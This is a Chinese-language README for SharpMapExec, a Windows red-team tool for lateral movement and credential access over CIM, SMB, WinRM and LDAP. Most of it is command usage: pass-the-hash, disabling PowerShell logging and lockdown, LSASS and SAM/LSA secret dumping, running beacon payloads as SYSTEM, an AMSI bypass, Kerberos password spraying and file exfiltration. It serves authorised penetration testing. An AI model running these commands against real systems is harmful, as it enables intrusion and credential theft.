Windows原生渗透测试瑞士军刀,用于横向移动、凭证访问、数据泄露和漏洞扫描,支持通过CIM、SMB、WinRM、LDAP和域协议,使用Kerberos/NTLM认证。
CrackMapExec 的锐化版本。此工具旨在简化网络渗透测试,并打造一把适用于 Windows 的瑞士军刀,这在内部威胁模拟演练中通常是必备要求。
除了扫描访问权限外,它还可用于识别易受攻击的配置和窃取数据。数据窃取模块的设计理念是在远程计算机上执行尽可能少的必要代码。为此,该工具会将所有秘密下载到 loot 目录并在本地解析。
您可以选择使用 Kerberos 还是 NTLM 身份验证。如果选择 Kerberos,该工具将创建一个牺牲令牌并使用 Rubeus 导入/请求票据。如果选择 NTLM,该工具将使用 SharpKatz 的 SetThreadToken 或 LogonUser 模拟。
SharpMapExec.exe
usage:
--- Cim ---
Need plaintext password or the /impersonate flag
SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET
Available Cim modules
/m:enable_winrm (Runs Enable-PSRemoting -Force)
/m:disable_winrm (Runs Disable-PSRemoting -Force)
/m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)
/m:disable_pslogging (Modify registry to disable PowerShell Logging)
/m:check_pslockdown (Check __PSLockdownPolicy registry)
/m:check_pslogging (Check PowerShell Logging registry)
--- Reg32 ---
SharpMapExec.exe ntlm reg32 /user:USER /ntlm:HASH /computername:TARGET
SharpMapExec.exe kerberos reg32 </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
Reg32 modules
/m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)
/m:check_pslockdown (Check __PSLockdownPolicy registry)
/m:check_pslogging (Check PowerShell Logging registry)
--- Smb ---
SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
Smb modules
/m:shares (Scan for accessible Smb shares)
--- WinRm ---
SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
WinRm modules
/m:exec /a:whoami (Invoke-Command)
/m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
/m:comsvcs (Dump & parse lsass)
/m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute local C# assembly in memory)
/m:assembly /p:beacon.exe /system (Execute local C# assembly as System in memory)
/m:assembly /p:getMailBox.exe /delegwalk (Execute local C# assembly in all unique delegation processes in memory)
/m:download /path:C:\file /destination:file (Download file from host)
/m:upload /path:C:\file /destination:file (Upload file to host)
--- Domain ---
SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC
SharpMapExec.exe tgtdeleg
--- Ldap ---
SharpMapExec.exe ntlm domain /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE
SharpMapExec.exe kerberos ldap </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE | /ticket:TICKET.Kirbi>
Ldap modules
/m:spraydata (Download user and password policy)
可用于扫描管理员访问权限、可访问的 Smb 共享、Smb 版本和中继签名。
/m:shares (扫描枚举的共享以检查访问权限)
重量级模块。内置了 AMSI 绕过、JEA 语言突破、JEA 功能分析。可用于代码执行、扫描 PsRemote 访问权限、易受攻击的 JEA 端点以及数据窃取。
/m:exec /a:whoami (Invoke-Command)
/m:exec /a:C:\beacon.exe /system (以系统身份执行 Invoke-Command)
/m:comsvcs (转储 Lsass 进程)
/m:secrets (转储并解析 Sam、Lsa 和 System Dpapi blob)
/m:assembly /p:Rubeus.exe /a:dump (在内存中执行本地 C# 程序集)
/m:assembly /p:beacon.exe /system (以系统身份在内存中执行本地 C# 程序集)
/m:download /path:C:\file /destination:file (从主机下载文件)
目前支持域密码喷射以及为当前用户创建 TGT,该 TGT 可与 /ticket 参数一起使用以获取当前上下文。
在密码喷射之前下载必要的数据
/m:spraydata (下载用户和密码策略)
用于轻松或在内存中批量执行 C# 程序集

Kerberos 密码喷射,然后扫描本地管理员访问权限

该项目支持扫描 JEA 端点,并会分析非默认命令的源代码,检查端点是否未配置为 no-language 模式。

使用 NT 哈希发现本地管理员密码复用。

使用内置的微软签名 DLL 批量转储 Lsass 进程,并保存到 loot 文件夹

在按用户去重后的所有委派进程中执行

扫描 SMB 签名和 SMBv1

以及更多功能!
某些使用 Kerberos 的场景需要您将时钟与 DC 同步并设置 DNS
net time \\DC01.hackit.local /set
Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')
为此工具提供帮助或已存在的项目